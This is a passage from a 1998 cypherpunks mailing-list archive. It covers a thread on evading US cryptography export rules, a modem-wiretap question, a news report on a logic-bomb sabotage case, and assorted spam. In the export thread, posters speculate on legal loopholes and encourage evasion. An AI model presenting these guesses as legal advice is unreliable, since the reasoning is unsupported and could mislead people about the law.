>> >>it to a web page I have on a server outside the US
>> >>will I have avoided the foolish export regs??
>> >>Does anyone know of someone trying this before?? 
>> >
>> >My guess is this:
>> >  if it has the name of a US citizen in the copyright
>> >notice, it will be assumed to have been made in the
>> >US. if the morons even go after you. you still may have
>> >a plausable excuse if ever taken to court.
>> >after all, you "exported" youself, which is a perfectly
>> >legal thing to take out of the country, and "yourself"
>> >accidentally spewed a copy of something that couldn't
>> >cross the border.
>> >I don't think anybody has tried this and been challenged.
>> >then again, a lot of us don't have the opportunity.
>> >It's easier to ask forgivness than permission...
>> >Another easier excuse would be to publish it freely in
>> >hardcopy form, and just "happen" to have somebody end up
>> >"typing" in your source code abroad, making a legit
>> >international copy...
>> >-Anon2
>> 
>> i would think that the big question here, legally, is whether or not you
>> would be ustilizing a US ISP and/or cellular provider to make the upload
>> of the crypto program to the foreign server via ftp.  as long as all the
>> packets stay outside of US borders, in other words, as long as you don't
>> use a US ISP and cellular provider, then i don't see how you would be
>> violating any laws in this case.
>> 
>> Regards,
>> 
>> TATTOOMAN 
>> 
>> http://152.7.11.38/~tattooman/
>> 
>Bob De Witt,
>rdew@el.nec.com
>The views expressed herein are my own,
>and are not attributable to any other
>source, be it employer, friend or foe.
> 
>

TATTOOMAN

/--------------------------[   TATTOOMAN   ]--------------------------\
| ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
| EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
| EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
| WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
| FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
| W3B: http://152.7.11.38/~tattooman/w3board/                         |
| PGP: finger tattooman@152.7.11.38                                   |
\----------------[   http://152.7.11.38/~tattooman/  ]----------------/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damacus -HHChat <hharc@damacus.dyn.ml.org>
Date: Tue, 17 Feb 1998 12:40:16 -0800 (PST)
To: hh-chat@gateway-1.secureservers.net
Subject: Re: [HH-CHAT] bugged?
In-Reply-To: <Pine.SOL.3.96.980216061644.7638A-100000@c00953-100lez.eos.ncsu.edu>
Message-ID: <Pine.LNX.3.96.980217143825.747A-100000@damacus.dyn.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


I don't know if there has been any ideas sent in reply to this yet, but it
is possible that this user has an X2 modem (it makes a beep before the
completion of a handshake to detect an X2 serving modem) or possibly a
K56flex (although I've nbever connected using one befire).  

Adios,

-D

On Mon, 16 Feb 1998, Ken Williams wrote:

> anybody have any ideas here?  this is a personal email forwarded to me
> from a friend who *might* have cause to believe he is bugged.  this is
> coming from a .au domain, btw.
> 
> thanx,
> 
> TATTOOMAN
> 
> http://152.7.11.38/~tattooman
> 
> ---------- Forwarded message ----------
> Date: Mon, 16 Feb 1998 20:41:23 +0930
> From: XXX@XXX.XXX
> To: jkwilli2@unity.ncsu.edu
> Subject: PGP
> 
> Yo tat,
> 
> I got pgp 5.0. which will not work with your version. Upgrade man :-)
> 
> Oh well I'll tell ya without pgp. It's not that much of a problem the
> question I wanted to ask you (well I hope it's not).
> 
> Anyway, what I wanted to ask you is whether you might know why I'm getting
> a very DISTINCTIVE beep when I connect with my modem to my ISP. The
> beep(only once) comes just after the initial dialup and just before all the
> noise you get before the connection. 
> 
> Sounds wierd and it only started 2 days ago. I never heard a connection
> like this before and I'm wondering whether my phone line is being tapped. 
> 
> Any suggestions ??
> 
> XXXXX
> 
> P.S. Just in case my mail is being read by someone other than
> Tattooman..here's to you (_|_)
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Mon, 16 Feb 1998 20:01:52 -0800 (PST)
To: "'Alan Olsen'" <jkwilli2@unity.ncsu.edu>
Subject: RE: bugged?
Message-ID: <ED111D55D096D111A1990000F8794AF506E13B@itfexch3.isd.tafensw.EDU.AU>
MIME-Version: 1.0
Content-Type: text/plain



Hi Alan,

I thought he was refering to that too, but notice
he says the beep is before the negotiation, just
after the dialing.

Bye for now.

> -----Original Message-----
> From:	Alan Olsen [SMTP:alan@clueserver.org]
> Sent:	Tuesday, February 17, 1998 7:06 AM
> To:	Ken Williams
> Cc:	cypherpunks@toad.com; dc-stuff@dis.org;
> hh-chat@gateway-1.secureservers.net
> Subject:	Re: bugged?
> 
> At 06:20 AM 2/16/98 -0500, Ken Williams wrote:
> >
> >anybody have any ideas here?  this is a personal email forwarded to
> me
> >from a friend who *might* have cause to believe he is bugged.  this
> is
> >coming from a .au domain, btw.
> 
> Sounds like he has a 56k modem and his ISP just upgraded to the same
> sort
> of 56k modem he has.  That is part of the protocol negotiation.  (In
> the
> future, it will take 30 minutes to finish connecting with a modem, but
> we
> will all get 666k transmission speed over normal phone lines.)
> 
> >
> >thanx,
> >
> >TATTOOMAN
> >
> >http://152.7.11.38/~tattooman
> >
> >---------- Forwarded message ----------
> >Date: Mon, 16 Feb 1998 20:41:23 +0930
> >From: XXX@XXX.XXX
> >To: jkwilli2@unity.ncsu.edu
> >Subject: PGP
> >
> >Yo tat,
> >
> >I got pgp 5.0. which will not work with your version. Upgrade man :-)
> >
> >Oh well I'll tell ya without pgp. It's not that much of a problem the
> >question I wanted to ask you (well I hope it's not).
> >
> >Anyway, what I wanted to ask you is whether you might know why I'm
> getting
> >a very DISTINCTIVE beep when I connect with my modem to my ISP. The
> >beep(only once) comes just after the initial dialup and just before
> all the
> >noise you get before the connection. 
> >
> >Sounds wierd and it only started 2 days ago. I never heard a
> connection
> >like this before and I'm wondering whether my phone line is being
> tapped. 
> >
> >Any suggestions ??
> >
> >XXXXX
> >
> >P.S. Just in case my mail is being read by someone other than
> >Tattooman..here's to you (_|_)
> >
> >
> ---
> |              "That'll make it hot for them!" - Guy Grand
> |
> |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:
> |
> | mankind free in one-key-steganography-privacy!"  | Ignore the man
> |
> |`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the
> keyboard.|
> |         http://www.ctrl-alt-del.com/~alan/
> |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 17 Feb 1998 17:34:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: $10million logic bomb goes off
Message-ID: <3.0.5.32.19980217163006.007a06e0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



http://biz.yahoo.com/upi/98/02/17/general_state_and_regional_news/nyzap_1.html

Tuesday February 17 4:16 PM EST 

Fired programmer zaps old firm

NEWARK, N.J., Feb. 17 (UPI) _ A disgruntled computer programmer dismissed
from a defense contractor has been arraigned for
allegedly zapping his old firm's computer system in retaliation, causing
losses of $10 million. 

Timothy Lloyd of Wilmington, Del. worked as the computer network programmer
for Omega Engineering Corp., in Bridgeport, N.J. The
company, which has offices in Stamford, Conn., and elsewhere in the world,
produces high-tech measurement and control instruments
used by the U.S. Navy and NASA. 

Lloyd was fired from Omega on July 10, 1996, after working there for about
11 years. Twenty days after his dismissal he allegedly
activated a computer ``bomb'' that permanently deleted all of the company's
design and production programs, costing the company about
$10 million in sales and contracts. 

Philadelphia Secret Service head Danny Spriggs says the $10 million in
damages is believed to be one of the most expensive computer
sabotage cases they have ever investigated. 

Lloyd was also charged with stealing $50,000 in computer equipment from
Omega and taking it home. 

U.S. District Judge William Walls set bail at $25,000 and scheduled trial
for April 20. 

If convicted Lloyd faces up to five years for the sabotage count and up to
10 years for the theft count. He could also be ordered to pay
restitution and fines. 

_- 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Has Nike hired Monica to endorse kneepads yet?





	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: press@daltek.net
Date: Mon, 16 Feb 1998 22:42:17 -0800 (PST)
To: press@daltek.net
Subject: Is Your Web Business a Winner?
Message-ID: <199802172247.QAA02202@smokey.redcomet.net>
MIME-Version: 1.0
Content-Type: text/plain


Checklist for success...

In 1993 there were 200,000 websites.
Today there are 20 million.

Internet sales will jump from 8 Billion today
to $300 Billion in the next five years.

Now - How can shoppers find you...and how to make sure
they buy from you? Do you have the 10 elements
for success? Do you have a powerful plan of attack
to stand out from the crowd?

Send for our free checklist and find out how you
rate. Because 70,000 new domains will be registered
this year - and you need to get ahead of the crowd.

FIND OUT HOW...

One Client's Sales doubled in a month.
One Client went from 0 overseas sales to 70% overseas sales.
One Client went from a small web page to their own server
with four employees taking orders from their computers.
One Client established a chain of retail outlets for their
products.
One Client sold the rights to a country for their products.

These folks all adopted at least one strategy in 
common that works - and you can too.

Email for no-obligation free options today. Just hit reply
and type SEND DETAILS PLEASE. Include your website address
(http://www  ) for free analysis. We guarantee it will amaze you! 

====================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Tue, 17 Feb 1998 18:30:18 -0800 (PST)
To: jkwilli2@unity.ncsu.edu
Subject: Re: Letter of the law
Message-ID: <199802180228.SAA12074@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain


Ken,

I guess I was thinking about the NSA, recording the message and deciding to 
make an example.  They seem to do that occassionally just to keep the rest
of us folks 'in line'.  I can't see the INS even understanding what they 
were looking at, even if you showed them.  "My, my, my!  All those bits are
really in that little box?"  You have to understand the difference between
a 'large possibility' and a 'fat chance', yes?

Now, drugs!  That they understand ...  But a PKI key?  Or, a file??  Or, a
crypto program (especially renamed)???  What piece of this trick question 
am I missing?

Bob De Witt,
 rdew@el.nec.com
The views expressed herein are my own,
and are not attributable to any other
source, be it employer, friend or foe.


> From jkwilli2@unity.ncsu.edu Tue Feb 17 10:56:22 1998
> X-Authentication-Warning: c00954-100lez.eos.ncsu.edu: jkwilli2 owned process doing -bs
> Date: Tue, 17 Feb 1998 13:56:29 -0500 (EST)
> From: Ken Williams <jkwilli2@unity.ncsu.edu>
> X-Sender: jkwilli2@c00954-100lez.eos.ncsu.edu
> To: Bob De Witt <rdew@el.nec.com>
> cc: cypherpunks@toad.com
> Subject: Re: Letter of the law
> X-Copyright: The contents of this message may not be reproduced in any form
> X-Copyright: (including Commercial use) unless specific permission is granted
> X-Copyright: by the author of the message.  All requests must be in writing.
> X-Disclaimer: The contents of this email are for educational purposes only
> X-Disclaimer: and do not reflect the thoughts or opinions of either myself
> X-Disclaimer: or my employer and are not endorsed by sponsored by or provided
> X-Disclaimer: on behalf of North Carolina State University.
> MIME-Version: 1.0
> 
> On Tue, 17 Feb 1998, Bob De Witt wrote:
> 
> >Doesn't the act of taking it across the border, in the laptop, constitute
> >an act of export??
> 
> well, yes, of course.  that was taken for granted in my comments.
> likewise, if you go to a tattoo parlor and get the infamous 4 line
> crypto-sig tattooed on your ass, then you are classified as a munition,
> and you cannot leave the US.
> 
> the only relevant question here regards the odds that a US Customs officer
> is going to want you to drop your drawers and bend over...
> ;-)
> 
> ken 
> 
> >> >>I'm in El Paso Texas... so close to the border
> >> >>I can see Old Mex outside my window as I write this..
> >> >>I'm over there nearly every day for lunch ( I actually
> >> >>walk there from my house it's so close) If I write
> >> >>a crypto program on my laptop over there and ftp
> >> >>it to a web page I have on a server outside the US
> >> >>will I have avoided the foolish export regs??
> >> >>Does anyone know of someone trying this before?? 
> >> >
> >> >My guess is this:
> >> >  if it has the name of a US citizen in the copyright
> >> >notice, it will be assumed to have been made in the
> >> >US. if the morons even go after you. you still may have
> >> >a plausable excuse if ever taken to court.
> >> >after all, you "exported" youself, which is a perfectly
> >> >legal thing to take out of the country, and "yourself"
> >> >accidentally spewed a copy of something that couldn't
> >> >cross the border.
> >> >I don't think anybody has tried this and been challenged.
> >> >then again, a lot of us don't have the opportunity.
> >> >It's easier to ask forgivness than permission...
> >> >Another easier excuse would be to publish it freely in
> >> >hardcopy form, and just "happen" to have somebody end up
> >> >"typing" in your source code abroad, making a legit
> >> >international copy...
> >> >-Anon2
> >> 
> >> i would think that the big question here, legally, is whether or not you
> >> would be ustilizing a US ISP and/or cellular provider to make the upload
> >> of the crypto program to the foreign server via ftp.  as long as all the
> >> packets stay outside of US borders, in other words, as long as you don't
> >> use a US ISP and cellular provider, then i don't see how you would be
> >> violating any laws in this case.
> >> 
> >> Regards,
> >> 
> >> TATTOOMAN 
> >> 
> >> http://152.7.11.38/~tattooman/
> >> 
> >Bob De Witt,
> >rdew@el.nec.com
> >The views expressed herein are my own,
> >and are not attributable to any other
> >source, be it employer, friend or foe.
> > 
> >
> 
> TATTOOMAN
> 
> /--------------------------[   TATTOOMAN   ]--------------------------\
> | ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
> | EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
> | EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
> | WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
> | FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
> | W3B: http://152.7.11.38/~tattooman/w3board/                         |
> | PGP: finger tattooman@152.7.11.38                                   |
> \----------------[   http://152.7.11.38/~tattooman/  ]----------------/
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@mtcnet.com
Date: Tue, 17 Feb 1998 18:43:31 -0800 (PST)
To: mark@mtcnet.com
Subject: CAN WE SWAP LINKS?                         ******************Please DO NOT consider this SPAM!******************
Message-ID: <199802180236.SAA26956@pumpkin.cdepot.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi, 

It's not a secret that the best way to attract traffic is through links from other sites. We currently have apx. 250 links from other sites TO US! This is nothing compared to Yahoo which has over 800,000 links from other sites. We are setting up a links page and offering a link to every domain or page that links to us. 

If interested visit our site at: http://www.mtcnet.com. If our site is ok link to us and send back your site address and category as IT WOULD FIT ON OUR LINK PAGE AT: http://www.mtcnet.com/links/ and we will link back to you. You should link to our main page: www.mtcnet.com and we will link to your main page.

Our site currently gets apx. 30,000+ views a month. 

Thanks,

Mark Cushman

P.S. We reserve the right as to which sites we will link back to, ie. no pornographic or related sites. If it's OK for my kids we will link back.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Tue, 17 Feb 1998 19:06:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Handling spam
Message-ID: <Pine.SUN.3.96.980217190341.1053A-100000@eve.speakeasy.org>
MIME-Version: 1.0
Content-Type: text/plain


For those of you who use mail-reading/downloading softs
that let you filter your messages based on header/body 
content (ie Eudora, ect), I've found a helpfull tool
that assists in the filtering out of spam.

If the Sender: header is "owner-cypherpunks@toad.com"
and the To: line does not contain the list address, you
can easily get a lot of the spam that comes through here.
I've resigned myself to creatively filtering out the spam
into the trash folder (or your equivilent, like deleting)
and leaving it at that, because of time constraints.

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
---
As kinky as this sounds, finger sheriff@speakeasy.org 
for my RSA PGP public key and my ICQ UIN.  If you don't
know what a UIN is, head on over to http://www.icq.com :)
---
Any and all commercial e-mail will be subject to a $5000
downloading, archival and consulting fee.  Cash/MO only.
Refusals will result in a default judgement of $10,000
and persuit from my favorite collection agency. NO SPAM!
---
     --- BEGIN INFLAMATORY BLOCK ---
Version: 0 (Survivors)
Comments: I was stewing about cliques when the rhyming
          bug bit.

          Watch them gather,
          watch them play.
          Watch the mailman
          blow them away.
     ---  END INFLAMATORY BLOCK  ---






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Tue, 17 Feb 1998 21:14:31 -0800 (PST)
To: anon@anon.efga.org
Subject: Stupid Law
Message-ID: <199802180443.UAA12254@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, it is.  Even if he wrote a program in Mexico, but carried his laptop
back and forth daily, each piece can come into the US, but cannot leave
again!  Uuuuuuuuummmmmmm, gooooood!  Read the actual documents.


Bob De Witt,
rdew@el.nec.com


> From anon@anon.efga.org Tue Feb 17 19:44:29 1998
> Date: Tue, 17 Feb 1998 22:08:26 -0500
> From: Anonymous <anon@anon.efga.org>
> Comments: This message did not originate from the Sender address above.
> 	It was remailed automatically by anonymizing remailer software.
> 	Please report problems or inappropriate use to the
> 	remailer administrator at <admin@anon.efga.org>.
> To: cypherpunks@toad.com
> 
> >Doesn't the act of taking it across the border, in the laptop, constitute
> >an act of export??
> 
> Well, yes it would, but the original scenario includes WRITING the code
> outside of the US, which means it never was a US creation, even if the
> creature that happened to be writing the code was native to the US.
> 
> The question is whether the dude could pull a stunt like this and get
> away with it. I'd say go for it. You got a plausible loophole to a
> stupid law that might not hold in court anyways.
> 
> -Anon
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Tue, 17 Mar 1998 03:35:51 -0800 (PST)
To: (Recipient list suppressed)
Subject: Pauline Hanson's One Nation update
Message-ID: <1.5.4.32.19980217095822.006d3428@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation Supporter in New South Wales,

Hard copy of Helen Dodd's book:
==============================
I was surprised to learn that small number of the limited edition, numbered
(150) copies of Helen Dodd's book "Pauline, the Hanson Phenomenon" signed by
Pauline Hanson are still available. They will definitely be sold out after
this post so get in quick.

The cost is Au$75 each and send you emails to:

camint@geocities.com

(As a matter of interest a $20 copy of Pauline Hanson's "The Truth" recently
sold for $250.)

++++++++++++++++++++++++++++++++++
One Nation birthday party:
=========================
For those of you ***who are members of Pauline Hanson's One Nation*** we are
holding a celebration of the party's first anniversary over the Easter
Weekend (April 10-12) on Pauline's rural property near Ipswich in South East
Queensland. In true Australian style camping and bar-b-ques under the
starlit sky will be the order of the day. There will be competitions,
entertainment like bush dancing, karaoke and horse racing - and much, much
more. 

If you are interested please contact (07) 3369 8214, 3848 2197, 3399 6662 or
3399 6901 for details.

Costs range from $25 per day for adults or just $45 for the three. Families
from $55 for the one day to $85 for the three.

Book before you put this one in your diary - once again very limited
numbers! Max of 400 people to be accepted.
+++++++++++++++++++++++++++++++++
Raffle tickets going fast:
=========================
The first prize is a QANTAS Global Explorer Holiday for two valued at
$12,000 - a 23 day trip visiting Paris, London, New York, Los Angeles,
Anaheim and Honolulu.

The second prize is a 7 day holiday to Hawaii at the Outrigger Reef Hotel
for two - value $5,000.

The third prize is a 7nights stay at the Novotel Palm Cove at Cairns - value
$3,000.

You can order a book of 5 tickets (minimum) at $10 per book (or $2 per
ticket) by credit card by phoning 1800 620088.

Winner's names being drawn at One Nation's Birthday Party at 7pm on April
11th 1998.

Winners will be notified by phone and mail with the results being published
in the Sydney Morning Herald on Friday 17th April 1998.

Order now while tickets remain!
++++++++++++++++++++++++++++++
Finally important Internet addresses:

Pauline Hanson's One Nation:
http://www.gwb.com.au/onenation

One Nation Press Releases (about 10 in the last month):
http://www.gwb.com.au/onenation/press/

One Nation on-line history (the first year):
(We will be updating this site live from the party on Pauline's property
during the Easter weekend in April):
http://www.gwb.com.au/gwb/news/history

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Tue, 17 Feb 1998 16:54:00 -0800 (PST)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19980217210008.25649.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Trans World Specials for 
 February 17th, 1998. 
 
 All tickets must be purchased by February 
 20th, 1998. Domestic fares are valid for outbound
 travel 2/21/98 and returning 2/23 or
 2/24/98.  New York to Milan fare is valid
 for outbound travel 2/20 or 2/21/98 
 and returning 2/24/or 2/25/98. 
 
 We have great fares to help you enjoy	
 the weekend. Relax on the beaches of 
 San Diego, or stroll the world class 
 shopping district in Milan. 
 
 
 On to this week's Trans World Specials.
 
 
 Roundtrip fare:		From:		To:
 
 $248			New York (JFK)	Milan(MXP)
 
 
 Out International fare is valid FROM New York TO Milan only.  As usual, 
 Domestic fares may originate in either city. 
 
 
 Roundtrip fare:		To/From:
 
 $69			St. Louis, MO (STL) / Nashville, TN (BNA)
 $69			St. Louis, MO (STL) / Cedar Rapids, IA (CID)
 $69			St. Louis, MO (STL) / Dayton, OH (DAY)
 
 
 $79			St. Louis, MO (STL) / Oklahoma City, OK (OKC)
 $79			St. Louis, MO (STL) / Shreveport, LA (SHV)
 $79			St. Louis, MO (STL) / Knoxville, TN (TYS)
 $79			Nashville, TN (BNA) / Cedar Rapids, IA (CID)
 
 
 $99			Nashville, TN (BNA) / Oklahoma City, OK (OKC)
 
 
 $129			Cedar Rapids, IA (CID) / Ontario, CA (ONT)
 $129			Newark, NJ (EWR) / Cedar Rapids, IA (CID)
 $129			Newark, NJ (EWR) / Oklahoma City, OK (OKC)
 $129			Newark, NJ (EWR) / Shreveport, LA (SHV)
 $129			Newark, NJ (EWR) / St. Louis, MO (STL)
 $129			Oklahoma City, OK (OKC) / Dayton, OH (DAY)
 
 
 $159			Dayton, OH (DAY) / Ontario, CA (ONT)
 $159			Dayton, OH (DAY) / San Diego, CA (SAN)
 $159			St. Louis, MO (STL) / Ontario, CA (ONT)
 $159			St. Louis, MO (STL) / San Diego, CA (SAN)
 $159			Ontario, CA (ONT) / Shreveport, LA (SHV)
 
 
 Call TWA at 1-800-221-2000 and book your Trans World Special today !
 
 
 
 ***********************************GETAWAY VACATIONS********************
 
 
 HAWAII OUTRIGGER MAILE SKY COURT INCLUDES:
 
 - roundtrip economy airfare
 - 5 nights accommodations at the Maile Sky Court
 - all rooms have refrigerator, cable TV and in-room movies
 - hotel features T.G.I. Friday's restaurant
 - 3 blocks from Waikiki beach
 - 2000 bonus FFB miles in addition to actual miles earned
 - only $599 from New York, Philadelphia, and Miami
 - only $659 from St. Louis
 
 
 BEST OF EGYPT FROM $2999 INCLUDES:
 
 - 7 night Nile Cruise
 - visit Cairo, Alexandria, Dendera, Luxor, Aswan, Abu, Simbel, Sakkara, Memphis
 - all meals while cruising
 - buffet breakfast daily
 - roundtrip economy airfare to Cairo
 - economy air tickets Cairo-Luxor, Aswan-Abu, and Simbel-Cairo
 - depart 3/27/98 from Chicago, St. Louis, Houston, Detroit, or Cleveland
 - 5000 bonus FFB miles in addition to actual miles earned
 
 Call 1-800-GETAWAY(438-2929) and book your Getaway Vacation today !
 
 
 
 ************************************ALAMO*******************************
 
 Alamo offers these low rates for an economy car valid 2/21/98 - 2/23/98
 
 
 $17.99		St. Louis, Dayton, Oklahoma City, 
 
 $20.99		Nashville, Newark, Shreveport, Knoxville
 
 $21.99		San Diego, Ontario
 
 For reservations call Alamo at 1-800-GO-ALAMO and request rate code RT
 and ID # 443833. For online reservations visit Alamo at
 http://www.goalamo.com
 
 
 ***********************************HILTON*******************************
 
 Hilton Hotels/Resorts offers this low rate valid the nights of 2/21/98-
 2/23/98.
 
 
 $93		Fort Lee Hilton, Fort Lee, NJ ( only 10 miles from Manhattan)
 
 
 For reservations call Hilton at 1-800-774-1500 and ask for Hilton Value Rates.
 Visit Hilton at http://www.hilton.com
 
 
 ******************************TERMS AND CONDITIONS**********************
 
 
 Airfare Terms and Conditions: 
 GENERAL CONDITIONS: Fares shown are round trip, nonrefundable and 
 are subject to change. Changes to itinerary are not permitted.
 Fares do not include Passenger Facility Charges of up to $12 
 depending on itinerary. Offer is not available in conjunction with 
 any other discount, coupon or promotional offer. Seats are limited 
 and may not be available on all flights or days of the week. Tickets 
 must be purchased at time of booking and no later than 2/20/98. 
 Standby passengers not allowed.  DOMESTIC: Valid for outbound travel 
 on Saturday (2/21) and return Monday (2/23) or Tuesday (2/24). 
 Travel is effective 2/21/98 with all travel to be completed by 
 2/24/98. Minimum stay is 2 days. Maximum stay is 3 days. Must use 
 E-Ticketing for domestic travel. Credit card is the only form of 
 payment accepted. 
 
 INTERNATIONAL: Valid for outbound travel on Friday (2/20) or Saturday 
 (2/21) and return Tuesday (2/24) or Wednesday (2/25). Travel is 
 effective 2/20/98 with all travel completed by 2/25/98. A $47 fee 
 for customs/immigration/APHIS fee/U.S. departure tax and security
 surcharges apply. An additional Italian departure tax of $9.00 also 
 applies. Tickets must be purchased at time of booking and no later than
 2/20/98. 
 
 Getaway Conditions: 
 ALL PACKAGES: Package includes round-trip economy airfare. Price is per 
 person based on double occupancy and is subject to change.  
 Availability, restrictions, surcharges, blackouts and cancellation 
 penalties apply. No other discounts or promotions are valid in 
 conjunction with these packages. 
 
 DOMESTIC CONDITIONS: Depart for Hawaii Wednesday or Thursday and return 
 Monday or Tuesday. Travel is valid 4/15-5/28/98 with all travel 
 completed by 6/3/98. Price does not include Passenger Facility Charges 
 of up to $16 per person. Full payment due by 2/20/98. 
 
 INTERNATIONAL CONDITIONS: Seats are limited and may not be available on 
 all flights. Price does not include Passenger Facility Charges, US 
 departure/arrival, agriculture and security fees from point of origin 
 of travel up to approximately $68 per person. Single suppliment $499. 
 Full payment is required by 2/23/98. 
 
 Car Rental Conditions: 
 Taxes (including in California, VLF taxes ranging up to $1.89 per day), 
 registrations fee/tax reimbursement, and airport access fees/taxes, if
 any, are extra. Optional CDW, liability insurance, fuel, additional 
 driver fee, drop charges and other optional items are extra. Rates 
 higher for renters under age 25. Rates valid for rentals commencing
 on Saturday and ending by 11:59 PM on Tuesday. Rates only valid during
 week in which they are published via TWA Internet site. A 24-hour 
 advance reservation is required. Availability is limited. 
 
 Hotel Conditions: 
 Hilton Hotels and Resorts special rates are available only during the 
 specific week in which they are published via the TWA Hot Deals 
 Internet site and the HiltonNet Internet site. Limited availability; 
 rooms at these Hilton Value Rates are sold on a first-come, 
 first-served basis. Availability, rate, and terms of occupancy are 
 not guaranteed and will be confirmed at time of reservation. 
 Participating hotels, rates and terms are subject to change without 
 notice. Single or double occupancy. Early check-in, late check-out 
 subject to availability. No extra charge for children when they 
 stay in parents' or grandparents' room; total room occupancy 
 subject to local fire safety regulations and other applicable laws 
 or regulations. Rates vary by season, do not include any other fees 
 or charges, including without limitation state or local taxes or 
 gratuities and are subject to change without notice. Advance booking 
 required. Advance deposit may be required. Offer cannot be combined 
 with any other special discounts, coupons, certificates, special 
 rates, promotional offers, award stays, or meeting/group stays.  
 Hilton reserves the right to cancel any Hilton Value Rate at any 
 time without notice. Hilton is not responsible for the terms of 
 other offers in the program, or for any electronic, computer, 
 telephone, security, virus or any other problem or damage related 
 to use of the program or its offers. 
 
 
 
 For reservations call 1-800-221-2000 (domestic) or 1-800-892-4141 
 (international) or call your travel agent and ask for TWA's special 
 Internet fares. 
 
 Remember to ask for Trans World(r) Electronic Ticketing when you 
 book your special Internet fare! 
 
 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rlbrye@daltek.net
Date: Tue, 17 Feb 1998 19:02:41 -0800 (PST)
To: rlbrye@daltek.net
Subject: FREE Pentium II Computer!!!
Message-ID: <199802180257.VAA11204@apollo.redcomet.net>
MIME-Version: 1.0
Content-Type: text/plain


You have been selected to receive this message because of your presence on
the World Wide Web.  If you wish to be removed from future mailings, please reply
with the subject  "Remove" and your address will be blocked from  future mailings.
////////////////////////////////////////////////////////////////////////////////

Would you like to Win a Free Pentium II Computer?...A Bahamas Vacation for two?...
Free advertising??

These are just a few of the fabulous prizes that will be awarded to subscribers to the
Enews over the next few months...and the best part is the subscription is FREE!!

Whether you are involved in an online  business or not.....This FREE weekly
Newsletter will benefit you....and cost you nothing!!!

Each issue of the FREE Enews is packed with informative articles on 
doing business on the net, tax tips, methods of analyzing 
opportunities, reviews of new businesses, reader comments, analysis 
of products to help your net business, etc. 

We have had rave reviews from our readers about the meaningful 
content and most of our new subscribers are referred by current 
subscribers.

We would like to have you as a subscriber and it costs you nothing, 
ever! That is the best part. To subscribe:

       mail to:rlbrye@daltek.net?subject=subad4

As soon as you subscribe, an issue will be sent out to you and then 
each Wednesday you will receive a new issue. Thanks for your time and 
we look forward to keeping you informed on the latest net marketing 
techniques.

Don't delay....Only subscribers are eligible to win the prizes in our fabulous
giveaways!!!  Subscribe Today!

Good luck in all your endeavors.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 17 Feb 1998 19:03:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <6c52fc4fbf1b77f88e3aeb3fffb90659@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


>Doesn't the act of taking it across the border, in the laptop, constitute
>an act of export??

Well, yes it would, but the original scenario includes WRITING the code
outside of the US, which means it never was a US creation, even if the
creature that happened to be writing the code was native to the US.

The question is whether the dude could pull a stunt like this and get
away with it. I'd say go for it. You got a plausible loophole to a
stupid law that might not hold in court anyways.

-Anon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 17 Feb 1998 20:31:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2d903692314a67a27cf3a173ba82fd9f@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


nobody@REPLAY.COM wrote:
-----------------------------------------------------
Here is description of my stream cipher, it operates one
...
...
VB source code:
^^^^^^^^^^^^^^^

------------------------------------------------------
Who the hell uses VB of all languages - to write
a crypto algorithm? And, which sane person uses
MicroSucks Winduhz? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sneakpreview@amninc.nu
